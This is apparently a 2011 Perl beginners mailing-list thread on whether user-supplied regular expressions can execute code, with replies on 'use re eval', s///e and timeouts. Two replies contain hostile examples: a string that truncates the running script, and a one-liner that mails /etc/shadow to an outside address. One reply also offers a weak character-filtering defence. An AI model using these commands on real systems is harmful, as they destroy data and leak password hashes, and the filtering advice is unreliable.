regexp validation (arbitrary code execution) (regexp injection)

Suppose you have a collection of books, and want to provide your users
with the ability to search the book title, author or content using
regular expressions.

But you don't want to let them execute any code.

How would you validate/compile/evaluate the user provided regex so as to
provide maximum flexibility and prevent code execution?

--
Eisenbits - proven software solutions: http://www.eisenbits.com/
OpenPGP: E3D9 C030 88F5 D254 434C 6683 17DD 22A0 8A3B 5CC0

--
To unsubscribe, e-mail: beginners-unsubscribe@perl.org
For additional commands, e-mail: beginners-help@perl.org
http://learn.perl.org/

RE: regexp validation (arbitrary code execution) (regexp injection)

From: Stanislaw Findeisen

> Suppose you have a collection of books, and want to provide your users
> with the ability to search the book title, author or content using
> regular expressions.
>=20
> But you don't want to let them execute any code.
>=20
> How would you validate/compile/evaluate the user provided regex so as
to
> provide maximum flexibility and prevent code execution?

You want them to run an application without having to run an
application? That doesn't make any sense.

You have several options available to give your users access to a
database.

1. Write a client application or applet they can copy or install on
their workstation to access the database directly.

2. Write a simpler application or applet that accesses a non-DB server
which in turn access the database.

3. Create a site on a web server they can access with a browser, which
then accesses the database.

There are any number of variations on these themes, but in each case,
they have to run some application code somewhere in order to access the
data.

Bob McConnell

--
To unsubscribe, e-mail: beginners-unsubscribe@perl.org
For additional commands, e-mail: beginners-help@perl.org
http://learn.perl.org/

Re: regexp validation (arbitrary code execution) (regexp injection)

On 2011-06-02 14:27, Bob McConnell wrote:
> From: Stanislaw Findeisen
>
>> Suppose you have a collection of books, and want to provide your users
>> with the ability to search the book title, author or content using
>> regular expressions.
>>
>> But you don't want to let them execute any code.
>>
>> How would you validate/compile/evaluate the user provided regex so as
> to
>> provide maximum flexibility and prevent code execution?
>
> You want them to run an application without having to run an
> application? That doesn't make any sense.

This is a complete misunderstanding. Sorry, perhaps I wasn't clear enough.

I was talking about users injecting *their* code via the regex. See for
instance:

http://perldoc.perl.org/perlretut.html#A-bit-of-magic:-execu ting-Perl-code-in-a-regular-expression

or /e modifier for the built-in function s (search and replace).

When doing:

$string =~ $regex

where $regex is user provided, arbitrary regular expression, anything
can happen.

--
Eisenbits - proven software solutions: http://www.eisenbits.com/
OpenPGP: E3D9 C030 88F5 D254 434C 6683 17DD 22A0 8A3B 5CC0

--
To unsubscribe, e-mail: beginners-unsubscribe@perl.org
For additional commands, e-mail: beginners-help@perl.org
http://learn.perl.org/

Re: regexp validation (arbitrary code execution) (regexp injection)

--20cf300fb0d38eeb7104a4ba671e
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: quoted-printable

2011/6/1 Stanisław Findeisen

> Suppose you have a collection of books, and want to provide your users
> with the ability to search the book title, author or content using
> regular expressions.
>
> But you don't want to let them execute any code.
>
> How would you validate/compile/evaluate the user provided regex so as to
> provide maximum flexibility and prevent code execution?
>
> --
> Eisenbits - proven software solutions: http://www.eisenbits.com/
> OpenPGP: E3D9 C030 88F5 D254 434C 6683 17DD 22A0 8A3B 5CC0
>
> --
> To unsubscribe, e-mail: beginners-unsubscribe@perl.org
> For additional commands, e-mail: beginners-help@perl.org
> http://learn.perl.org/
>
>
> Hi Stanisław,

From what you are saying I think you are looking for an option to take a
string and check it for any potential bad characters that would cause syste=
m
to execute unwanted code.

So a bit like this: "In.*?forest$" is a safe string to feed into your
regular expression but: ".*/; open my $fh, ">", $0; close $fh; $_ =3D ~/" i=
s
an evil string causing you a lot of grief. At least that is how I understan=
d
your question...

To be honest I am not sure if this is an issue as I suspect that the
following construction.
if ( $title =3D~ m/$userinput/ ) { do stuff... }
will give you any issues as far as I can remember the variable that you are
feeding here will not be treated as code by the interpreted but simply as a
matching instructions which would mean that what ever your user throws at i=
t
perl will in the worst case return an failure to match.

But please don't take my word for it try it in a very simple test and see
what happens.

If you do have to ensure that a user cannot execute any code you could
simply prevent the user from entering the ; or smarter yet filter this out
from the user input, to prevent a "smart" user from feeding it to your code
via an method other then the front-end you provided. Without a means to
close the previous regular expression the user can not really insert
executable code into your regular expression. At least thats what I would
try but I am by no means an expert in the area and I suspect there might be
some people reading this and wondering why I didn't think of A, B or C if s=
o
please do speak up people ;-)

Regards,

Rob

--20cf300fb0d38eeb7104a4ba671e--

Re: regexp validation (arbitrary code execution) (regexp injection)

>>>>> "Stanisław" == Stanisław Findeisen > writes:

Stanisław> But you don't want to let them execute any code.

Unless "use re 'eval'" is in scope, /$a/ is safe even if $a came from an
untrusted source, as long as you limit the run-time to a few seconds or
so with an alarm. (Some regex can take nearly forever to fail.)

See "perldoc perlre" for more details.

--=20
Randal L. Schwartz - Stonehenge Consulting Services, Inc. - +1 503 777 00=
95

Smalltalk/Perl/Unix consulting, Technical writing, Comedy, etc. etc.
See http://methodsandmessages.posterous.com/ for Smalltalk discussion

--=20
To unsubscribe, e-mail: beginners-unsubscribe@perl.org
For additional commands, e-mail: beginners-help@perl.org
http://learn.perl.org/

Re: regexp validation (arbitrary code execution) (regexp injection)

On Wed, Jun 01, 2011 at 11:25:39PM +0200, Stanisław Findeisen wrote:
> Suppose you have a collection of books, and want to provide your users
> with the ability to search the book title, author or content using
> regular expressions.
>=20
> But you don't want to let them execute any code.
>=20
> How would you validate/compile/evaluate the user provided regex so as t=
o
> provide maximum flexibility and prevent code execution?

In general this shouldn't be a problem provided you don't turn on

use re "eval";

$ perl -e '/$ARGV[0]/' '(?{ print "hello" })'
Eval-group not allowed at runtime, use re 'eval' in regex m/(?{ print
"hello" })/ at -e line 1.

$ perl -Mre=3Deval -e '/$ARGV[0]/' '(?{ print "hello" })'
hello

Of course, you're not going to be too worried about people saying hello,
but once you can execute arbitrary code all bets are off:

$ perl -e '/$ARGV[0]/' '(?{ system "sudo mailx -s ha baddie\@example.co=
m < /etc/shadow" ])'

Make sure you don't do the whole match as part of a string eval, and
since you're only matching, you shouldn't have to worry about s///e.

If you prefer a more paranoid approach you might want to restrict the
characters you allow in the user input, but this doesn't provide maximum
flexibility.

--=20
Paul Johnson - paul@pjcj.net
http://www.pjcj.net

--
To unsubscribe, e-mail: beginners-unsubscribe@perl.org
For additional commands, e-mail: beginners-help@perl.org
http://learn.perl.org/